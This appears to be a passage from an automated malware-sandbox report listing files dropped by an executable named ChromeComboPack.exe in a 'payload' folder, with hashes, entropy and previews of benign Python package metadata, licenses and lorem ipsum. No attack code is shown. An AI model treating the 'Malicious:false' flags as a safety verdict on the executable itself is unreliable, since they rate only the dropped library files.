                                                                                                                                                                                                                                            SHA-256:8B86946900D7FA38DD1102B9C1EBE17A0CB1F09C8B7E29F61F2BDA4A4DC51ECA
                                                                                                                                                                                                                                            SHA-512:F4E892B3D41482E3B17642B1D722B6E2A8E8DD4833F0623C29ED2D50D55CFC68DA1F9756B4E08723DC89F3E552424096C92912AC4DA533FE8E2DC59DC19EA9CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.functools.Version: 4.0.1.Summary: Functools like those found in stdlib.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.functools.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest >=6 ;
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                                                                                            Entropy (8bit):5.807846597836061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Tmn/2zDRvbqfuggoaGnXamZlKZBX3vpBvt+c0X4yWJV:TmnuXRzUuggDifZlmX/aWJV
                                                                                                                                                                                                                                            MD5:85FB54BAFB143CD57D1787F7EF74FDB2
                                                                                                                                                                                                                                            SHA1:A915BBCDF108A58F3DFC1783D9D4DD3B7F3CE23A
                                                                                                                                                                                                                                            SHA-256:632AA7C04F7C4BCC01C027AF5B9BC76FE8958F4A181035B957A3BD3014BA248B
                                                                                                                                                                                                                                            SHA-512:2A39B4C6F221F88EC61D584C8CD3CAD358E8C7B50E529192105A0A4144ED3C2A4CE8B630C39C18D20E27FE226A23E2DE23CDFF8E3D3693959B165A9A2F9047CD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.functools-4.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.functools-4.0.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.functools-4.0.1.dist-info/METADATA,sha256=i4aUaQDX-jjdEQK5wevhegyx8JyLfin2HyvaSk3FHso,2891..jaraco.functools-4.0.1.dist-info/RECORD,,..jaraco.functools-4.0.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.functools-4.0.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/functools/__init__.py,sha256=hEAJaS2uSZRuF_JY4CxCHIYh79ZpxaPp9OiHyr9EJ1w,16642..jaraco/functools/__init__.pyi,sha256=gk3dsgHzo5F_U74HzAvpNivFAPCkPJ1b2-yCd62dfnw,3878..jaraco/functools/__pycache__/__init__.cpython-312.pyc,,..jaraco/functools/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):3658
                                                                                                                                                                                                                                            Entropy (8bit):5.02710641474483
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:DYMaCFS802Vpnu388Ksc+fIybwFiR8g6RSwTsL:pFz02Vpnu388KB+gybwgRd6RSwTsL
                                                                                                                                                                                                                                            MD5:70FE732EDE8F8E6C84DA4EA21D4933E5
                                                                                                                                                                                                                                            SHA1:A7763789FA56CEBBAA849368FAAC7D386F170399
                                                                                                                                                                                                                                            SHA-256:03359D9BA56231F0CE3E840C7CB5A7DB380141218949CCAA78DDBD4DCB965D52
                                                                                                                                                                                                                                            SHA-512:4C8D3D5078840BD4DBE20458EBF52890585C5911C22C3EFCE2FB28985461BC80469339DDAF6016FB099C84BDF9B41A26FF1884B456422A8D0C682104D7950D91
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.text.Version: 3.12.1.Summary: Module for text manipulation.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.text.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: jaraco.functools.Requires-Dist: jaraco.context >=4.1.Requires-Dist: autocommand.Requires-Dist: inflect.Requires-Dist: more-itertools.Requires-Dist: importlib-resources ; python_version < "3.9".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1500
                                                                                                                                                                                                                                            Entropy (8bit):5.794249493238335
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:TkLFn/2zDVLFvbqfuaLFo2kXLFGnLFEsJiLFXamdLFlKbkZ6d3JpPXu/1XWXYXw2:TcnuXDzUuuCw5Jmfblyz3Jp2/NUsM0bN
                                                                                                                                                                                                                                            MD5:39FCCE64BC768C2046067E4AAD8465F0
                                                                                                                                                                                                                                            SHA1:2EFC0FC776576A8FE01BBACD0760A49EEE6481DA
                                                                                                                                                                                                                                            SHA-256:816D945741DCA246099388CA3EED74FC0667ACBAA36F70B559B2494C3979B1F6
                                                                                                                                                                                                                                            SHA-512:FB2335A6675F9CADEEE38B666FAB9EA1D8BFBA6B7768253D42F44149591A3239F4B2FA19DDF2C282DC7E47A01D7DCA69AADBBCDAC9107EDBCB2C22D11BA81287
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.text-3.12.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.text-3.12.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.text-3.12.1.dist-info/METADATA,sha256=AzWdm6ViMfDOPoQMfLWn2zgBQSGJScyqeN29TcuWXVI,3658..jaraco.text-3.12.1.dist-info/RECORD,,..jaraco.text-3.12.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..jaraco.text-3.12.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.text-3.12.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/text/Lorem ipsum.txt,sha256=N_7c_79zxOufBY9HZ3yzMgOkNv-TkOTTio4BydrSjgs,1335..jaraco/text/__init__.py,sha256=Y2YUqXR_orUoDaY4SkPRe6ZZhb5HUHB_Ah9RCNsVyho,16250..jaraco/text/__pycache__/__init__.cpython-312.pyc,,..jaraco/text/__pycache__/layouts.cpython-312.pyc,,..jaraco/text/__pycache__/show-newlines.cpython-312.pyc,,..jaraco/text/__pycache__/strip-prefix.cpython-312.pyc,,..jaraco/text/__py
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (888)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1335
                                                                                                                                                                                                                                            Entropy (8bit):4.226823573023539
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:FP6Hbz+g9RPZ14bJi04L6GEbX4UQF4UkZQhxI2EIhNyu:9E+i6bJmLm43+Uxxnh0u
                                                                                                                                                                                                                                            MD5:4CE7501F6608F6CE4011D627979E1AE4
                                                                                                                                                                                                                                            SHA1:78363672264D9CD3F72D5C1D3665E1657B1A5071
                                                                                                                                                                                                                                            SHA-256:37FEDCFFBF73C4EB9F058F47677CB33203A436FF9390E4D38A8E01C9DAD28E0B
                                                                                                                                                                                                                                            SHA-512:A4CDF92725E1D740758DA4DD28DF5D1131F70CEF46946B173FE6956CC0341F019D7C4FECC3C9605F354E1308858721DADA825B4C19F59C5AD1CE01AB84C46B24
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum..Curabitur pretium tincidunt lacus. Nulla gravida orci a odio. Nullam varius, turpis et commodo pharetra, est eros bibendum elit, nec luctus magna felis sollicitudin mauris. Integer in mauris eu nibh euismod gravida. Duis ac tellus et risus vulputate vehicula. Donec lobortis risus a elit. Etiam tempor. Ut ullamcorper, ligula eu tempor congue, eros est euismod turpis, id tincidunt sapien risus a quam. Maecenas fermentum consequat mi. Donec fermentum. Pellentesque malesuada nulla a mi. Duis sapien sem, aliquet nec, commodo eget, consequat quis, neque.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1053
                                                                                                                                                                                                                                            Entropy (8bit):5.0945274555157285
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:arOJH7H0yxgtUHw1hC09QHOsUv4eOk4/+/m3oqLFh:aSJrlxEvdQHOs5exm3ogFh
                                                                                                                                                                                                                                            MD5:3396EA30F9D21389D7857719816F83B5
                                                                                                                                                                                                                                            SHA1:0D43A836DAC65C0EA426AD49C881A1086600BF85
                                                                                                                                                                                                                                            SHA-256:09F1C8C9E941AF3E584D59641EA9B87D83C0CB0FD007EB5EF391A7E2643C1A46
                                                                                                                                                                                                                                            SHA-512:D43092223392EDDA3BD777625F5BF54ACB0CC00C25555A4F8A16DB9CCDAFC380D3204486CB2A5FDC9D3F9E459B1FED948FFC7000AA0E40F37B807A01F4421294
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) 2012 Erik Rose..Permission is hereby granted, free of charge, to any person obtaining a copy of.this software and associated documentation files (the "Software"), to deal in.the Software without restriction, including without limitation the rights to.use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies.of the Software, and to permit persons to whom the Software is furnished to do.so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in all.copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH THE SO
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):36293
                                                                                                                                                                                                                                            Entropy (8bit):3.717596190655759
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:bs9cnyPtWIRmL0QnCHx4Zi3XBB9GcF89oi+odVBqCv9d3m24TeYH5AvDpG27IFf5:Ua+H1Nsg/
                                                                                                                                                                                                                                            MD5:5BA05B51B603386707E1E3A101CDD6B3
                                                                                                                                                                                                                                            SHA1:FFCCEC7FD799CC4AB07530954FEF3BE2472E2C23
                                                                                                                                                                                                                                            SHA-256:0453BDD0EF9F2CD89540CA63EE8212E73B73809514419DD3037D8FE471F737E0
                                                                                                                                                                                                                                            SHA-512:FE7F7D6B6C8089B09A18930EF462BA4C7A15EAF6D3E8610AC655ECADE16CE31D9C01ECE84C88A3C2D9DD34DE70E194A020E28179CF33B21389EE3EEFC7229B74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: more-itertools.Version: 10.3.0.Summary: More routines for operating on iterables, beyond itertools.Keywords: itertools,iterator,iteration,filter,peek,peekable,chunk,chunked.Author-email: Erik Rose <erikrose@grinchcentral.com>.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: Natural Language :: English.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: Implementation :: CPython.Classifier: Programming Language :: Python :: Implementation :: Py
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1259
                                                                                                                                                                                                                                            Entropy (8bit):5.794423512787632
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Bhxn/2zDahxvIhxphxBhxEsJXhxzvXiCflBJRHXoggtqgmf7WJhmsxmwG:hnuXwOph5J3zvXi4Lo7qgQ7WJhS
                                                                                                                                                                                                                                            MD5:178EE325409DD28809AD3661E8819EF8
                                                                                                                                                                                                                                            SHA1:F5844FAC6E3C9133FE5F1B8195EE801959801DF3
                                                                                                                                                                                                                                            SHA-256:77C8E73E018DC0FD7E9ED6C80B05A4404545F641FB085220CE42B368B59AA3D3
                                                                                                                                                                                                                                            SHA-512:2DB06B622F644674BF7D7AD8B780F9802858D15D73B5075139C2D82181DD6D589B90172BCA7AE9C785E705F447F523DB2AE641826C550C599551A7D8C2396FC2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:more_itertools-10.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..more_itertools-10.3.0.dist-info/LICENSE,sha256=CfHIyelBrz5YTVlkHqm4fYPAyw_QB-te85Gn4mQ8GkY,1053..more_itertools-10.3.0.dist-info/METADATA,sha256=BFO90O-fLNiVQMpj7oIS5ztzgJUUQZ3TA32P5HH3N-A,36293..more_itertools-10.3.0.dist-info/RECORD,,..more_itertools-10.3.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..more_itertools-10.3.0.dist-info/WHEEL,sha256=rSgq_JpHF9fHR1lx53qwg_1-2LypZE_qmcuXbVUq948,81..more_itertools/__init__.py,sha256=dtAbGjTDmn_ghiU5YXfhyDy0phAlXVdt5klZA5fUa-Q,149..more_itertools/__init__.pyi,sha256=5B3eTzON1BBuOLob1vCflyEb2lSd6usXQQ-Cv-hXkeA,43..more_itertools/__pycache__/__init__.cpython-312.pyc,,..more_itertools/__pycache__/more.cpython-312.pyc,,..more_itertools/__pycache__/recipes.cpython-312.pyc,,..more_itertools/more.py,sha256=1E5kzFncRKTDw0cYv1yRXMgDdunstLQd1QStcnL6U90,148370..more_itertools/more.pyi,sha256=iXXeqt48Nxe8VGmIWpkVXuKpR2FYNuu2DU8nQL
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):81
                                                                                                                                                                                                                                            Entropy (8bit):4.672346887071811
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX/QFML6KjP+tPCCfA5I:Rt1QqL6gWBB3
                                                                                                                                                                                                                                            MD5:FE76A5D309B5416824C2034FBF8A16CD
                                                                                                                                                                                                                                            SHA1:5975EB6043863B0D018A5D751293F38E0B8E2874
                                                                                                                                                                                                                                            SHA-256:AD282AFC9A4717D7C7475971E77AB083FD7ED8BCA9644FEA99CB976D552AF78F
                                                                                                                                                                                                                                            SHA-512:6E4610171DD4E7E49FB4570CF3562D26A4F171FF67DA0F3A259A77916ACB939C8FCA7DA9F473EFAD839947796AC8CD7385DAA3264ADB150FF131A5C0FAC9329C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: flit 3.8.0.Root-Is-Purelib: true.Tag: py3-none-any.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.510719529760597
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreBNA2eBKmJozlMHuO:h9Co8FyQjkDYc5tWreBN0n2mH1
                                                                                                                                                                                                                                            MD5:FAADAEDCA9251A90B205C9167578CE91
                                                                                                                                                                                                                                            SHA1:ED1FCABA1DBBF55113ABB419A484F3DF63E7ECFC
                                                                                                                                                                                                                                            SHA-256:CAD1EF5BD340D73E074BA614D26F7DEACA5C7940C3D8C34852E65C4909686C48
                                                                                                                                                                                                                                            SHA-512:1E69C89558FFE39E5C1EBB6728C4F0EB6023563C7A7F31B5417A8EFCC906378D2E2AF7B0E06A66980FBAAB7996AEB2AE1EA3918FDBE5FFCC3F77EA888A68EFBC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to this software is made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\ChromeComboPack.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10174
